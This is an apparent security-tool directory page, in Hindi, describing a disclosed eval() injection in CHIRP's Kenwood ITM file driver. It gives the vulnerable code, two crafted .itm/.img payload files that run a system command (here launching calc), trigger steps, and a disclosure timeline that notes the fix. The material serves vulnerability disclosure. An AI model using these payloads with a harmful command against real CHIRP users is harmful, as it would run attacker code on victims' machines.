Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CHIRP-CodeExecution_via_Malicious_ImageFile — हैम रेडियो प्रोग्रामिंग एप्लिकेशन में eval() इंजेक्शन के माध्यम से मनमाना कोड निष्पादन (arbitrary code execution) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जिसमें दुर्भावनापूर्ण .itm/.img फ़ाइल पेलोड और मूल कारण विश्लेषण (root-cause analysis) शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/cduram/chirp-codeexecution_via_malicious_imagefile
भेद्यता विश्लेषणशोषणपेलोड डेवलपमेंट
GitHubcduram/chirp-codeexecution_via_malicious_imagefile

CHIRP-CodeExecution_via_Malicious_ImageFile

हैम रेडियो प्रोग्रामिंग एप्लिकेशन में eval() इंजेक्शन के माध्यम से मनमाना कोड निष्पादन (arbitrary code execution) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जिसमें दुर्भावनापूर्ण .itm/.img फ़ाइल पेलोड और मूल कारण विश्लेषण (root-cause analysis) शामिल हैं।

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
1 दिन पहलेअभी तक समीक्षित नहीं

CHIRP — केनवुड ITM ड्राइवर में eval() के माध्यम से मनमाना कोड निष्पादन

उत्पाद: CHIRP - हैम रेडियो प्रोग्रामिंग के लिए एक ओपन-सोर्स परियोजना।
प्रभावित संस्करण: URL: https://github.com/kk7ds/chirp, https://chirpmyradio.com
प्रभावित संस्करण: <= chirp-next-20260814
CWE: CWE-95 (Eval Injection)


अवलोकन

CHIRP का केनवुड ITM फ़ाइल प्रारूप ड्राइवर किसी खोली गई फ़ाइल से कच्चे CSV फ़ील्ड मानों को बिना किसी सत्यापन के सीधे Python के अंतर्निहित eval() को भेजता है। एक हमलावर जो CHIRP उपयोगकर्ता को एक विशेष रूप से तैयार फ़ाइल वितरित करता है, वह पीड़ित उपयोगकर्ता के रूप में मनमाना कोड निष्पादन प्राप्त करता है।

मूल कारण

chirp/drivers/kenwood_itm.py, _clean_tmode(), पंक्तियाँ 66–67:

root@kitploit:~
def _clean_tmode(self, headers, line, mem):
    rtone = eval(generic_csv.get_datum_by_header(headers, line, "TXSIG"))  # SINK
    ctone = eval(generic_csv.get_datum_by_header(headers, line, "RXSIG"))  # SINK

TXSIG और RXSIG मान सीधे खोली गई फ़ाइल की CSV पंक्ति से आते हैं। eval() से पहले कोई प्रकार जाँच, अनुमति सूची, या सैंडबॉक्सिंग लागू नहीं की जाती।

POCs

नीचे दो POCs दिए गए हैं।

दुर्भावनापूर्ण .itm

root@kitploit:~
// Malicious .itm POC
CH,ZN,RXF,TXF,NAME,TXSIG,RXSIG
1,1,146.520000,146.520000,PoC,__import__('os').system('calc'),0

दुर्भावनापूर्ण .img

root@kitploit:~
// Malicious .img POC
CH,ZN,RXF,TXF,NAME,TXSIG,RXSIG
1,0,146520000,146520000,PoC,__import__('os').system('calc.exe'),0

 chirpεimgeyJyY2xhc3MiOiAiSVRNUmFkaW8iLCAidmVuZG9yIjogIktlbndvb2QiLCAibW9kZWwiOiAiSVRNIiwgInZhcmlhbnQiOiAiIiwgImNoaXJwX3ZlcnNpb24iOiAiZGFpbHktMjAyMzAxMDEifQ==

CHIRP में ट्रिगर करना

  1. CHIRP लॉन्च करें।
  2. File → Open.
  3. {file_name}.img चुनें। यदि .itm पेलोड का उपयोग कर रहे हैं, तो फ़िल्टर ड्रॉपडाउन को "All Files" में बदलें (CHIRP में ITM के लिए कोई फ़िल्टर नहीं है)।
  4. {file_name}.itm चुनें।

प्रकटीकरण

2026-08-17 -- भेद्यता की खोज की गई
2026-08-17 -- अनुरक्षक को ईमेल किया गया
2026-08-17 -- अनुरक्षक ने उत्तर दिया और उसी दिन कोड ठीक कर दिया। https://github.com/kk7ds/chirp/commit/39178dbfc4fece083ab9ed20286d6ae3a91a718e
2026-08-21 -- इंस्टॉलर रिलीज़ 20260821 में यह सुधार शामिल है।

टूल डाउनलोड करें